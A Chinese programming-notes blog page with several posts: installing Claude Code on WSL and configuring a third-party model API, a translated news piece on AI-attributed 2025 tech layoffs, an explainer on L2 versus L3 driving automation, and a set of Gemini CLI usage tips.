编程笔记

Claude Code(1)在 WSL Ubuntu 上安装和配置指南

2026-03-19T16:00:00.000Z

本文介绍如何在 Windows Subsystem for Linux (WSL) Ubuntu 环境中安装和配置 Claude Code，以及如何使用第三方大模型 API。

前置要求

在开始之前，请确保您已准备好：

WSL Ubuntu - 已安装并配置好 WSL Ubuntu 环境
终端访问权限 - 打开 WSL 终端
代码项目 - 准备一个要处理的项目目录
API 访问权限 - 拥有 Claude 订阅或第三方 LLM API 密钥

安装 Claude Code

这是最简单的安装方式，支持自动后台更新：

curl -fsSL https://claude.ai/install.sh | bash

安装完成后，claude 命令将被添加到系统 PATH 中。

如果已安装 npm，也可以通过 npm 安装：

npm install -g @anthropic-ai/claude-code

验证安装

安装完成后，验证安装是否成功：

claude --version

配置

使用 Claude 订阅登录

首次启动 Claude Code 时，需要登录账户：

claude  # 首次使用时会提示登录

支持的账户类型：

Claude Pro/Max/Teams/Enterprise（推荐）
Claude Console（使用 API 预付费额度）
企业云提供商：Amazon Bedrock、Google Vertex AI、Microsoft Foundry

登录后，凭据将保存在系统中，无需重复登录。如需切换账户，使用 /login 命令。

跳过登录（使用第三方 API）

如果您只想使用第三方 LLM API 而不登录 Claude 账户，需要配置环境变量（见下文）。

使用第三方 LLM API

命令行下使用 Claude Code 时，在 ~/.claude/settings.json 中配置。
在 VS Code 中使用时，先安装 Claude Code 插件，再点击插件的设置按钮，在 VS Code 的配置文件中配置。

命令行

{
 "theme":"light",
 "env":{
    "ANTHROPIC_API_KEY":"sk-你的api key",
    "ANTHROPIC_BASE_URL":"https://api.qnaigc.com",
    "ANTHROPIC_DEFAULT_HAIKU_MODEL": "z-ai/glm-4.5",
    "ANTHROPIC_DEFAULT_SONNET_MODEL": "z-ai/glm-4.6",
    "ANTHROPIC_DEFAULT_OPUS_MODEL": "z-ai/glm-5",
    "ANTHROPIC_MODEL": "z-ai/glm-4.5",
    "CLAUDE_CODE_DISABLE_NONESSENTIAL_TRAFFIC": "1",
    "API_TIMEOUT_MS": "3000000"
 },
 "hasCompletedOnboarding": true
}

ANTHROPIC_BASE_URL,第三方大模型api 地址,我这里使用七牛云的,点击注册免费获取1000万token
hasCompletedOnboarding 必须配置,不然一直提示需要claude code账户
ANTHROPIC_DEFAULT_HAIKU_MODEL,简单快速任务指定模型
ANTHROPIC_DEFAULT_SONNET_MODEL,日常编码任务模型
ANTHROPIC_DEFAULT_OPUS_MODEL,复杂推理任务模型
ANTHROPIC_MODEL,默认模型
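
如果只想在当前终端会话里临时试用第三方 API，而不改动 settings.json，可以把同样的变量直接导出到 shell 环境中。下面是一个最小示意：变量名和取值沿用上文配置，函数名 use_third_party_api 是为演示而起的；这里假设 Claude Code 会像读取 settings.json 的 env 字段一样读取进程环境变量。hasCompletedOnboarding 不是环境变量，仍需在 settings.json 中设置。

```shell
# 在当前 shell 会话中临时启用第三方 API（取值沿用上文示例）。
# use_third_party_api 是演示用的函数名，密钥通过第一个参数传入。
use_third_party_api() {
    export ANTHROPIC_API_KEY="$1"
    export ANTHROPIC_BASE_URL="https://api.qnaigc.com"
    export ANTHROPIC_DEFAULT_HAIKU_MODEL="z-ai/glm-4.5"
    export ANTHROPIC_DEFAULT_SONNET_MODEL="z-ai/glm-4.6"
    export ANTHROPIC_DEFAULT_OPUS_MODEL="z-ai/glm-5"
    export ANTHROPIC_MODEL="z-ai/glm-4.5"
}

# 用法：use_third_party_api "sk-你的api key" && claude
```

这些导出只在当前会话有效，关闭终端后即失效，适合在写入配置文件之前先验证密钥和模型名是否可用。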

vscode中claude code 插件配置

如果找不到配置文件的位置，请点击 Claude Code 插件的 Settings（设置）按钮。

"claudeCode.environmentVariables": [
    {"name":"ANTHROPIC_API_KEY","value": "sk-你的api key"},
    {"name":"ANTHROPIC_BASE_URL","value": "https://api.qnaigc.com"},
    {"name":"ANTHROPIC_DEFAULT_HAIKU_MODEL","value": "z-ai/glm-4.5"},
    {"name":"ANTHROPIC_DEFAULT_SONNET_MODEL","value": "z-ai/glm-4.7"},
    {"name":"ANTHROPIC_DEFAULT_OPUS_MODEL","value": "z-ai/glm-5"},
    {"name":"ANTHROPIC_MODEL","value": "z-ai/glm-4.6"}
],
"claudeCode.disableLoginPrompt": true,
"claudeCode.hideOnboarding": true

在插件中，claudeCode.disableLoginPrompt 用于禁用登录提示。开启后，只要配置了第三方 API，插件就不会再提示登录 Claude Code 账户。

常用命令

命令	说明	示例
`claude`	启动交互模式	`claude`
`claude "任务"`	执行一次性任务	`claude "修复构建错误"`
`claude -p "查询"`	执行单次查询后退出	`claude -p "解释这个函数"`
`claude -c`	继续当前目录最近对话	`claude -c`
`claude -r`	恢复之前的对话	`claude -r`
`/clear`	清除对话历史	`/clear`
`/help`	显示可用命令	`/help`
`exit` 或 Ctrl+C	退出 Claude Code	`exit`

获取帮助

(译)AI 裁员潮：亚马逊、微软等科技巨头将 2025 年裁员归因于人工智能

2025-12-23T16:00:00.000Z

[导读] 随着 2025 年接近尾声，科技行业的裁员潮并未平息。与往年不同的是，今年的裁员逻辑发生了根本性转变：企业裁员不再仅仅是因为宏观经济压力，而是为了腾出资金和岗位，全力冲刺人工智能（AI）领域。据咨询公司 Challenger, Gray & Christmas 统计，今年美国有近 55,000 个岗位的裁员被归因于 AI。

资源重组：从传统业务转向 AI

包括亚马逊（Amazon）、微软（Microsoft）和谷歌母公司 Alphabet 在内的科技巨头在最新的财报和内部备忘录中明确表示，2025 年的裁员计划与公司的 AI 长期战略紧密相连。

亚马逊：优化云计算与 Alexa 部门

今年十月，亚马逊宣布了其历史上最大规模的裁员，裁减了 14,000 个企业岗位，旨在投资其“最大赌注”，其中包括人工智能。

亚马逊最近宣布将在其 AWS（云计算）部门和 Alexa 硬件部门进行新一轮裁员。公司发言人表示：“我们正在不断审视业务，以确保投资与客户需求相匹配。在某些领域，我们正在缩减规模，以便将资源重新投入到支撑未来增长的生成式 AI 项目中。”

微软：投资 OpenAI 后的结构调整

截至目前，微软（Microsoft）在 2025 年已裁减约 15,000 个岗位，其中最近一次是 7 月宣布的 9,000 人裁员。

微软尽管在 AI 领域处于领先地位，但其首席执行官萨提亚·纳德拉（Satya Nadella）强调了“财务纪律”的重要性。微软在 2025 年的裁员主要集中在非核心软件业务和部分硬件部门。公司表示，通过减少这些领域的开支，微软可以每年额外投入数十亿美元用于扩建 AI 数据中心和购买昂贵的 Nvidia 芯片。

IBM: AI替代

全球科技巨头 IBM 首席执行官阿尔文德·克里希纳（Arvind Krishna）今年五月告诉《华尔街日报》，人工智能聊天机器人已经取代了几百名人力资源员工的工作岗位。
然而，与其他在裁员中引用人工智能的公司不同，Krishna 承认公司在其他需要更多批判性思维的领域增加了招聘，如软件工程、销售和市场营销。
今年 11 月，公司宣布全球裁员 1%，这可能影响近 3,000 名员工。

2025 年裁员的核心特征

根据 CNBC 的分析，2025 年的裁员呈现出以下三个显著特点：

“瘦身”与“招聘”并行：虽然公司在裁减传统程序员、营销人员和管理岗位，但他们同时也在以极高的薪酬争抢机器学习工程师和 AI 研究员。
效率为王：Meta 首席执行官马克·扎克伯格（Mark Zuckerberg）提出的“效率之年”概念在 2025 年得到了延续。AI 自动化工具正开始取代公司内部的一些重复性行政和初级编码工作。
长期估值压力：华尔街投资者现在不仅关注公司的收入增长，更关注公司如何利用 AI 提高利润率。裁减冗余人员被视为提高人效比的关键手段。

“这不再是关于‘生存在下行周期’，而是关于‘在 AI 时代保持竞争力’。” 投行 Jefferies 的分析师在报告中指出，“如果你不裁掉那些不增长的部分来喂养 AI 这头‘巨兽’，你就会掉队。”

员工的焦虑与技能重塑

裁员消息对硅谷和全球科技社区产生了冲击。就业调查显示，超过 60% 的科技从业者担心自己的岗位会被 AI 取代。

专家建议，职场人士应关注以下领域的技能提升：

提示词工程（Prompt Engineering）
AI 模型调优与部署
复杂问题的系统架构设计（这是目前 AI 尚难完全替代的领域）

结论

2025 年的裁员潮标志着科技行业的一个新纪元。正如 2000 年代初的互联网转型一样，阵痛是巨大的，但它预示着一个以人工智能为核心的全新产业结构的诞生。对于亚马逊、微软等巨头而言，裁员不是结束，而是资源重新分配的开始。

原文&参考

https://www.cnbc.com/2025/12/21/ai-job-cuts-amazon-microsoft-and-more-cite-ai-for-2025-layoffs.html
据咨询公司 Challenger, Gray & Christmas 统计，今年美国有近 55,000 个岗位的裁员被归因于 AI: https://www.cnbc.com/2025/12/04/layoff-announcements-this-year-top-1point1-million-the-most-since-2020-when-pandemic-hit-challenger-says.html

AI|L2和L3级自动驾驶有什么区别

2025-12-15T16:00:00.000Z

L2和L3级自动驾驶有什么区别:

1. L2级别：你是“主驾驶”，它是“好助手”

通俗定义： 组合辅助驾驶。
状态： 你的手可以短暂离开（或者轻扶），但你的眼睛和大脑必须时刻盯着路况。
谁在开车： 本质上还是你在开车。车只是在帮你控制油门、刹车和方向盘（比如自动跟车、保持在车道中间）。
关键点： 如果前方突然出现个障碍物，车没识别出来，撞上了，责任全是你的。你不能玩手机，不能看电影。
目前市面情况： 特斯拉的AP、各种造车新势力的“领航辅助（NOA/NGP）”，绝大多数都属于L2（或者叫L2.5、L2.9）。

2. L3级别：它是“临时司机”，你是“监考官”

通俗定义： 有条件的自动驾驶。
状态： 在特定条件下（比如高速公路、堵车路段），你的眼睛可以离开路面，双手可以离开方向盘。你可以刷短视频、发邮件，甚至吃个泡面。
谁在开车： 这个阶段，车才是司机。它承诺在这些特定情况下能搞定一切。
关键点： 如果在系统运行期间，车自己撞了，责任通常由汽车厂家承担。但是，你不能睡觉，因为当系统遇到搞不定的情况（比如修路、暴雨），它会疯狂尖叫提醒你，你必须在几秒钟内接管。
目前市面情况： 极少。奔驰、宝马的部分车型在德国等地区拿到了牌照，国内正在逐步开放试点。

四个维度的核心区别：

维度	L2 级（辅助驾驶）	L3 级（自动驾驶）
责任人	始终是你	系统负责（在它工作时）
注意力	必须时刻盯着路	可以分心（看书、玩手机）
双手	必须随时准备接管	可以脱离，但接到指令需接管
分水岭意义	人是主体，机器是工具	机器是主体，人是后备

总结：

L2 就像是一个刚拿驾照的新手坐在驾驶位： 你坐在副驾驶，手得扶着方向盘，眼得盯着前方的坑，随时准备帮他踩刹车。他是帮你省力的，但你心里的弦得绷着。
L3 就像是你雇了一个司机： 你可以坐在驾驶位上处理工作，不用看路。但这个司机比较胆小，他遇到解决不了的难题会大喊“老板快来拉一把”，这时候你得立刻扔掉手机接管。

一句话总结：L2是“省力不省心”，L3是“既省力又省心（但不能睡觉）”。

AI|Gemini CLI 实用技巧与窍门

2025-12-15T16:00:00.000Z

本指南涵盖约30个有效使用 Gemini CLI 进行智能编码的专业技巧

Gemini CLI 是一个开源 AI 助手，将 Google Gemini 模型的强大功能直接带入您的终端。它作为一个对话式的”智能”命令行工具运行——意味着它可以理解您的请求，选择工具（如运行 shell 命令或编辑文件），并执行多步骤计划来协助您的开发工作流程。

实际上，Gemini CLI 就像一个超级强化的编程伙伴和命令行助手。它在编码任务、调试、内容生成甚至系统自动化方面表现出色，全部通过自然语言提示完成。在深入探讨专业技巧之前，让我们快速回顾一下如何设置 Gemini CLI 并开始使用。

入门指南

安装： 您可以通过 npm 安装 Gemini CLI。全局安装请使用：

npm install -g @google/gemini-cli

或者使用 npx 无需安装直接运行：

npx @google/gemini-cli

Gemini CLI 在所有主要平台上都可用（使用 Node.js/TypeScript 构建）。安装完成后，只需在终端中运行 gemini 命令即可启动交互式 CLI。

身份验证： 首次使用时，您需要通过 Gemini 服务进行身份验证。您有两个选择：(1) Google 账户登录（免费层） - 这让您免费使用 Gemini 2.5 Pro，享有慷慨的使用限制（约每分钟 60 次请求和每天 1,000 次请求）。启动时，Gemini CLI 会提示您使用 Google 账户登录（无需账单信息）。(2) API 密钥（付费或更高级别访问） - 您可以从 Google AI Studio 获取 API 密钥，并设置环境变量 GEMINI_API_KEY 来使用它。

使用 API 密钥可以提供更高的配额和企业数据使用保护；付费使用中的提示不会用于训练，但日志可能会为安全目的而保留。

例如，在您的 shell 配置文件中添加：

export GEMINI_API_KEY="YOUR_KEY_HERE"

基本用法： 启动交互式会话，只需运行不带参数的 gemini。您会看到一个 gemini> 提示符，可以在其中输入请求或命令。例如：

$ gemini
gemini> Create a React recipe management app using SQLite

然后您可以观看 Gemini CLI 创建文件、安装依赖、运行测试等，以满足您的请求。如果您偏好一次性调用（非交互式），使用带有提示的 -p 标志，例如：

gemini -p "Summarize the main points of the attached file. @./report.txt"

这将输出单个响应并退出。您也可以将输入传递给 Gemini CLI：例如，echo "Count to 10" | gemini 会通过标准输入提供提示。

CLI 界面： Gemini CLI 提供丰富的类似 REPL 的界面。它支持斜杠命令（以 / 为前缀的特殊命令，用于控制会话、工具和设置）和感叹号命令（以 ! 为前缀，直接执行 shell 命令）。我们将在下面的专业技巧中介绍其中的许多命令。默认情况下，Gemini CLI 在安全模式下运行，任何修改系统的操作（写入文件、运行 shell 命令等）都会要求确认。当提出工具操作时，您会看到差异或命令，并被提示（Y/n）批准或拒绝它。这确保 AI 不会在未经您同意的情况下进行不必要的更改。

了解了基础知识后，让我们探索一系列专业技巧和隐藏功能，帮助您充分利用 Gemini CLI。每个技巧首先提供一个简单的示例，然后是更深入的细节和细微差别。这些技巧融合了工具创建者（如 Taylor Mullen）和 Google 开发者关系团队的建议，以及更广泛社区的见解，旨在成为 Gemini CLI 高级用户的权威指南。

技巧1：使用 `GEMINI.md` 实现持久化上下文

快速使用场景： 不必在每次提示中重复相同的背景说明。通过创建 GEMINI.md 文件提供项目特定的上下文或指令，AI 就能始终掌握重要的背景知识，无需每次重新告知。

在处理项目时，您通常有一些总体细节——例如编码风格指南、项目架构或重要事实——希望 AI 记住。Gemini CLI 允许您将这些信息编码到一个或多个 GEMINI.md 文件中。只需在项目中创建 .gemini 文件夹（如果尚不存在），并添加名为 GEMINI.md 的 Markdown 文件，其中包含您希望 AI 持久保存的任何注释或指令。例如：

# Phoenix 项目 - AI 助手
- 所有 Python 代码必须遵循 PEP 8 风格。
- 使用 4 个空格进行缩进。
- 用户正在构建数据管道；优先考虑函数式编程范式。

将此文件放在您的项目根目录（或子目录中，以获得更细粒度的上下文）。现在，每当您在该项目中运行 gemini 时，它都会自动将这些指令加载到上下文中。这意味着模型将始终准备好这些指令，避免需要在每个提示前添加相同的指导。

工作原理： Gemini CLI 使用分层上下文加载系统。它将全局上下文（来自 ~/.gemini/GEMINI.md，您可用于跨项目默认值）与您的项目特定的 GEMINI.md 甚至子文件夹中的上下文文件结合起来。更具体的文件会覆盖更通用的文件。您可以随时使用以下命令检查加载了什么上下文：

/memory show

这将显示 AI 看到的完整组合上下文。如果您更改了 GEMINI.md，使用 /memory refresh 重新加载上下文而无需重新启动会话。

提示： 使用 /init 斜杠命令快速生成初始的 GEMINI.md。在新项目中运行 /init 会创建一个模板上下文文件，包含检测到的技术栈、项目摘要等信息。然后您可以编辑和扩展该文件。对于大型项目，考虑将上下文分解为多个文件，并使用 @include 语法将它们导入到 GEMINI.md 中。例如，您的主 GEMINI.md 可以包含类似 @./docs/prompt-guidelines.md 的行来引入额外的上下文文件。这使您的指令保持组织有序。

通过精心制作的 GEMINI.md，您实际上为 Gemini CLI 提供了项目需求和约定的”记忆”。这种持久化上下文会带来更相关的响应，减少来回的提示工程。
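
作为参考，下面的脚本片段演示如何在项目根目录生成一份最小的 GEMINI.md。这只是一个示意：函数名 init_gemini_md 是为演示而起的，模板内容取自上文示例；文件已存在时不会被覆盖。

```shell
# 若目标目录还没有 GEMINI.md，就写入一份最小模板；已存在则跳过。
# init_gemini_md 是演示用的函数名，第一个参数是项目目录（缺省为当前目录）。
init_gemini_md() {
    target="${1:-.}/GEMINI.md"
    if [ -e "$target" ]; then
        echo "已存在，跳过：$target"
        return 0
    fi
    cat > "$target" <<'EOF'
# Phoenix 项目 - AI 助手
- 所有 Python 代码必须遵循 PEP 8 风格。
- 使用 4 个空格进行缩进。
- 用户正在构建数据管道；优先考虑函数式编程范式。
EOF
    echo "已创建：$target"
}

# 用法：init_gemini_md ~/projects/phoenix
```

生成后，如果会话正在运行，可以用上文提到的 /memory refresh 让 Gemini CLI 重新加载上下文。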

技巧2：创建自定义斜杠命令

快速使用场景： 通过定义自己的斜杠命令来加速重复性任务。例如，您可以创建一个命令 /test:gen 从描述生成单元测试，或者 /db:reset 来删除并重新创建测试数据库。这相当于用为您的工作流程量身定制的一行命令来扩展 Gemini CLI 的功能。

Gemini CLI 支持自定义斜杠命令，您可以在简单的配置文件中定义它们。在底层，这些本质上都是预定义的提示模板。要创建一个，在 ~/.gemini/ 下创建 commands/ 目录用于全局命令，或在您项目的 .gemini/ 文件夹中用于项目特定命令。在 commands/ 内部，为每个新命令创建一个 TOML 文件。文件名格式决定了命令名称：例如文件 test/gen.toml 定义了命令 /test:gen。

让我们通过一个示例。假设您想要一个命令来根据需求描述生成单元测试。您可以创建 ~/.gemini/commands/test/gen.toml，内容如下：

# 调用方式：/test:gen "测试描述"
description = "根据需求生成单元测试"
prompt = """
您是专业的测试工程师。基于以下需求，请使用 Jest 框架编写一个全面的单元测试。

需求：{{args}}
"""

现在，重新加载或重启 Gemini CLI 后，您可以简单地输入：

/test:gen "确保登录按钮在成功后重定向到仪表板"

Gemini CLI 会识别 /test:gen 并用提供的参数替换提示模板中的 {{args}}（在本例中是需求）。然后 AI 将相应地生成 Jest 单元测试。description 字段是可选的，但在您运行 /help 或 /tools 列出可用命令时使用。

这个机制极其强大：实际上，您可以用自然语言为 AI 编写脚本。社区创建了许多有用的自定义命令。例如，Google 的 DevRel 团队分享了数十个实用工作流程命令（通过开源仓库），以展示如何为常见流程编写脚本，如创建 API 文档、清理数据或构建模板代码。通过定义自定义命令，您可以将复杂的提示（或一系列提示）打包成可重用的快捷方式。

提示： 自定义命令还可以用来强制输出格式，或在特定任务中为 AI 设定“角色”。例如，您可以定义一个 /review:security 命令，总是在提示前加上“您是安全审计员…”来审查代码漏洞。这种方法确保 AI 在处理特定类别任务时的响应保持一致。

要与团队共享命令，您可以将 TOML 文件提交到您项目的仓库中（在 .gemini/commands 目录下）。拥有 Gemini CLI 的团队成员在项目中工作时会自动获取这些命令。这是在团队中标准化 AI 辅助工作流程的好方法。
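
下面的片段把“文件路径决定命令名”的规则以及项目级命令文件的创建过程写成了脚本，仅作示意。command_name 和 make_security_review_command 都是为演示而起的函数名，TOML 中的提示词也只是按上文 /review:security 的思路拟的示例。

```shell
# 把 commands/ 下的相对路径换算成斜杠命令名：test/gen.toml -> /test:gen
command_name() {
    rel="${1%.toml}"                                      # 去掉 .toml 后缀
    printf '/%s\n' "$(printf '%s' "$rel" | tr '/' ':')"   # 目录分隔符换成冒号
}

# 在项目的 .gemini/commands/ 下生成 review/security.toml（演示用函数名）。
# 第一个参数是项目目录，缺省为当前目录。
make_security_review_command() {
    dir="${1:-.}/.gemini/commands/review"
    mkdir -p "$dir"
    cat > "$dir/security.toml" <<'EOF'
description = "以安全审计员的视角审查代码"
prompt = """
您是安全审计员。请审查以下代码中的安全漏洞，并按严重程度列出问题。

{{args}}
"""
EOF
}

# 用法：
#   make_security_review_command .
#   command_name review/security.toml
```

把生成的 .gemini/commands 目录提交到仓库后，团队成员在该项目中启动 Gemini CLI 时就能使用同一条命令。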

技巧3：使用自己的 `MCP` 服务器扩展 Gemini

快速使用场景： 假设您希望 Gemini 与外部系统或未内置的自定义工具交互——例如，查询专有数据库或与 Figma 设计集成。您可以通过运行自定义模型上下文协议 (MCP) 服务器并将其插入 Gemini CLI 来实现这一点。

Gemini CLI 开箱即用地提供了几个 MCP 服务器（例如，支持 Google 搜索、代码执行沙箱等），您也可以添加自己的MCP服务器。MCP 服务器本质上是一个外部进程（可以是本地脚本、微服务甚至云端点），使用简单的协议来处理 Gemini 的任务。这种架构极大提升了 Gemini CLI 的可扩展性。

MCP 服务器示例： 一些社区和 Google 提供的 MCP 集成包括Figma MCP（从 Figma 获取设计细节）、剪贴板 MCP（读取/写入系统剪贴板）等。实际上，在内部演示中，Gemini CLI 团队展示了一个”Google Docs MCP”服务器，允许直接将内容保存到 Google Docs。即，每当 Gemini 需要执行内置工具无法处理的操作时，它可以委托给您的 MCP 服务器。

如何添加一个MCP服务器： 您可以通过 settings.json 或使用 CLI 配置 MCP 服务器。对于快速设置，尝试 CLI 命令：

gemini mcp add myserver --command "python3 my_mcp_server.py" --port 8080

这会注册一个名为”myserver”的服务器，Gemini CLI 将通过运行给定命令（这里是一个 Python 模块）在端口 8080 上启动它。在 ~/.gemini/settings.json 中，它会在 mcpServers 下添加一个条目。例如：

"mcpServers": {
  "myserver": {
    "command": "python3",
    "args": ["-m", "my_mcp_server", "--port", "8080"],
    "cwd": "./mcp_tools/python",
    "timeout": 15000
  }
}

此配置告诉 Gemini 如何启动 MCP 服务器及其位置。一旦运行，该服务器提供的工具就可被 Gemini CLI 使用。您可以使用斜杠命令列出所有 MCP 服务器及其工具：

/mcp

这将显示任何注册的服务器及其暴露的工具名称。

MCP 的强大之处： MCP 服务器可以提供丰富的多模态结果。例如，通过 MCP 提供的工具可以返回图像或格式化表格作为 Gemini CLI 响应的一部分。它们还支持 OAuth 2.0，因此您可以安全地连接到 API（如 Google 的 API、GitHub 等），而无需暴露凭据。本质上，如果您能编写它，就可以将其包装为 MCP 工具——将 Gemini CLI 变成协调许多服务的中心。

默认与自定义： 默认情况下，Gemini CLI 的内置工具涵盖了很多功能（读取文件、网络搜索、执行 shell 命令等），但 MCP 让您能够更进一步。一些高级用户创建了 MCP 服务器来与内部系统交互或执行专门的数据处理。例如，您可以有一个 database-mcp 提供 /query_db 工具用于在公司数据库上运行 SQL 查询，或一个 jira-mcp 通过自然语言创建工单。

创建自己的MCP服务器时，请注意安全性：默认情况下，自定义 MCP 工具需要确认，除非您将它们标记为受信任。您可以通过设置（如服务器的 trust: true 以自动批准其工具操作）或通过将特定的安全工具列入白名单、将危险工具列入黑名单来控制安全性。

简而言之，MCP 服务器解锁了无限的集成可能性。MCP是专业功能，让 Gemini CLI 成为您的 AI 助手与您需要它与之工作的任何系统之间的粘合剂。如果您有兴趣构建一个，请查看官方 MCP 指南和社区示例。

技巧4：利用记忆添加与召回

快速使用场景： 通过将重要事实添加到 AI 的长期记忆中来保持它们触手可及。例如，在弄清楚数据库端口或 API 令牌后，您可以执行：

/memory add "我们的预发布 RabbitMQ 在端口 5673 上"

这将存储该事实，以便您（或 AI）以后不会忘记。

/memory 命令提供了简单但强大的持久化记忆机制。当您使用 /memory add 时，给定的文本会附加到您项目的全局上下文中（从技术上说，它会被保存到全局 ~/.gemini/GEMINI.md 文件或项目的 GEMINI.md 中）。这有点像做笔记并将其固定到 AI 的虚拟公告板上。一旦添加，AI 将在未来的交互中始终在提示上下文中看到该笔记，跨会话有效。

考虑一个例子：您在调试问题时发现了一个不明显的见解（”配置标志 X_ENABLE 必须设置为 true，否则服务启动失败”）。如果将此添加到记忆中，后来如果您的 AI 正在讨论相关问题，它不会忽略这个关键细节——它在上下文中。

使用 /memory：

/memory add "<文本>" - 向记忆添加事实或注释（持久化上下文）。这会立即使用新条目更新 GEMINI.md。
/memory show - 显示记忆的完整内容（即当前加载的组合上下文文件）。
/memory refresh - 从磁盘重新加载上下文（如果您在 Gemini CLI 外部手动编辑了 GEMINI.md 文件，或者多个人在协作编辑它，这很有用）。

因为记忆以 Markdown 存储，您也可以手动编辑 GEMINI.md 文件来策划或组织信息。/memory 命令是为了对话中的便利而存在，这样您就不必打开编辑器。

提示： 此功能非常适合”决策日志”。如果您在聊天期间确定了一种方法或规则（例如，使用某个特定库或约定的代码风格），将其添加到记忆中。然后 AI 会回忆起该决定并在以后避免与之矛盾。它对于可能跨越数小时或数天的长会话特别有用——通过保存关键点，您可以减少模型在对话变长时忘记早期上下文的倾向。

另一个用途是个人笔记。因为 ~/.gemini/GEMINI.md（全局记忆）为所有会话加载，您可以在其中放置一般偏好或信息。例如，”用户姓名是 Alice。请礼貌说话，避免俚语。”这就像配置 AI 的角色或全局知识。但请注意，全局记忆适用于所有项目，所以不要用项目特定信息使其杂乱。

总之，记忆添加与召回帮助 Gemini CLI 维护状态。将其视为随项目增长的知识库。使用它来避免重复自己，或提醒 AI 一些事实,否则它需要从头重新探索。
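
既然记忆就是 Markdown 文件，也可以在 CLI 之外用脚本追加条目。下面是一个最小示意：remember 是为演示而起的函数名，并非 Gemini CLI 自带的命令；它只是往文件末尾追加一个列表项，CLI 自己写入记忆时使用的具体格式可能与此不同。

```shell
# 向指定的 GEMINI.md 追加一条备注；缺省写入全局文件 ~/.gemini/GEMINI.md。
# remember 是演示用的函数名：第一个参数是备注文本，第二个参数是目标文件（可选）。
remember() {
    note="$1"
    file="${2:-$HOME/.gemini/GEMINI.md}"
    mkdir -p "$(dirname "$file")"
    # 文件中已有完全相同的一行时不重复追加
    if [ -f "$file" ] && grep -qxF -- "- $note" "$file"; then
        return 0
    fi
    printf '%s\n' "- $note" >> "$file"
}

# 用法：remember "我们的预发布 RabbitMQ 在端口 5673 上" ./GEMINI.md
```

如果追加时 Gemini CLI 会话正在运行，需要执行 /memory refresh 才能让新条目进入上下文。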

技巧5：使用检查点机制和 `/restore` 作为撤销按钮

快速使用场景： 如果 Gemini CLI 对您的文件进行了一系列您不满意的更改，您可以立即回滚到先前的状态。在启动 Gemini 时（或在设置中）启用检查点机制，并使用 /restore 命令像轻量级 Git 撤销一样撤销更改。

Gemini CLI 的检查点机制功能充当安全网。启用后，CLI 在每次修改文件的工具执行之前对项目文件进行快照。如果出现问题，您可以恢复到最后已知的良好状态。这本质上是 AI 操作的版本控制，无需您每次都手动提交到 Git。

如何使用它： 您可以通过使用 --checkpointing 标志启动 CLI 来启用检查点机制：

gemini --checkpointing

或者，您可以通过添加到配置中使其成为默认设置（在 settings.json 中添加 "checkpointing": { "enabled": true }）。激活后，您会注意到每次 Gemini 即将写入文件时，它会显示类似”检查点已保存”的内容。

如果您随后发现 AI 制作的编辑有问题，您有两个选择：

运行 /restore list（或仅运行不带参数的 /restore）查看带有时间戳和描述的最近检查点列表。
运行 /restore <id> 回滚到特定检查点。如果省略 id 且只有一个待处理的检查点，它将默认恢复该检查点。

例如：

/restore

Gemini CLI 可能输出：

0: [2025-09-22 10:30:15] 运行 ‘apply_patch’ 之前
1: [2025-09-22 10:45:02] 运行 ‘write_file’ 之前

然后您可以执行 /restore 0 将所有文件更改（甚至对话上下文）恢复到该检查点时的状态。通过这种方式，您可以”撤销”错误的代码重构或 Gemini 进行的任何其他更改。

被恢复的内容： 检查点捕获您工作目录的状态（Gemini CLI 允许修改的所有文件）和工作空间文件（对话上下文也可能根据检查点捕获方式回滚）。恢复时，它会覆盖文件到旧版本并将对话内存重置到该快照。这就像将 AI 代理时间旅行回它犯错之前。请注意，它不会撤消外部数据（例如，如果 AI 运行了数据库迁移，它无法撤消该操作），但文件系统中的任何内容和聊天上下文会。

最佳实践： 对于一般任务，最好保持检查点机制开启。开销很小，并提供安心感。如果您发现不需要检查点（一切都顺利进行），您可以随时清除它或让下一个覆盖它。开发团队建议在多步骤代码编辑之前特别使用检查点机制。但对于关键任务项目，您仍应使用适当的版本控制（git）作为主要安全网——将检查点视为快速撤销的便利，而不是完整的 VCS。

本质上，/restore 让您有信心地使用 Gemini CLI。您可以让 AI 尝试大胆的更改，知道您有一个”天哪”按钮可以在需要时随时回档。

技巧6：读取 Google Docs、Sheets 等文件。配置了 Workspace MCP 服务器后，您可以粘贴 Docs/Sheets 链接，MCP 将获取其内容（需要权限）

快速使用场景： 想象您有一个包含某些规则或数据的 Google Doc 或 Sheet，希望 AI 使用。您无需复制粘贴内容，只需提供链接，配置了 Workspace MCP 服务器的 Gemini CLI 就可以获取并读取它。

例如：

Summarize the requirements from this design doc: https://docs.google.com/document/d/<id>

Gemini 可以提取该文档的内容并将其合并到其响应中。类似地，它可以通过链接读取 Google Sheets 或 Drive 文件。

工作原理： 这些功能通常通过MCP 集成启用。Google 的 Gemini CLI 团队已经构建（或正在开发）Google Workspace 的连接器。一种方法是运行一个小型 MCP 服务器，使用 Google 的 API（Docs API、Sheets API 等）在给定 URL 或 ID 时检索文档内容。配置后，您可能有斜杠命令或工具如 /read_google_doc，或者仅仅是自动检测看到 Google Docs 链接并调用相应工具来获取它。

例如，在 Agent Factory 播客演示中，团队使用了一个Google Docs MCP 将摘要直接保存到文档中——这意味着它首先也可以读取文档内容。实际上，您可能执行类似以下操作：

@https://docs.google.com/document/d/XYZ12345

使用 @ 包含 URL（上下文引用语法）向 Gemini CLI 发出信号获取该资源。有了 Google Doc 集成，该文档的内容将被拉取，就好像它是本地文件一样。从那里，AI 可以对其进行摘要、回答相关问题或以其他方式在对话中使用它。

类似地，如果您粘贴 Google Drive文件链接，正确配置的 Drive 工具可以下载或打开该文件（假设权限和 API 访问已设置）。Google Sheets 可以通过运行查询或读取单元格范围的 MCP 提供，使您能够询问诸如”这个 Sheet [链接] 中预算列的总和是多少？”之类的问题，并让 AI 计算它。

设置： 在撰写本文时，Google Workspace 集成可能需要一些调整（获取 API 凭据、运行 MCP 服务器等）。请关注官方 Gemini CLI 存储库和社区论坛以获取即用型扩展——例如，官方的 Google Docs MCP 可能作为插件/扩展提供。如果您感兴趣，可以按照指南在 MCP 服务器中使用 Google API 编写一个。这通常涉及处理 OAuth（Gemini CLI 为 MCP 服务器支持）然后暴露如 read_google_doc 等工具。

使用提示： 当您拥有这些工具时，使用它们可以像在提示中提供链接一样简单（AI 可能会自动调用工具来获取它）或使用斜杠命令如 /doc open 。检查 /tools 查看可用的命令——Gemini CLI 在那里列出所有工具和自定义命令。

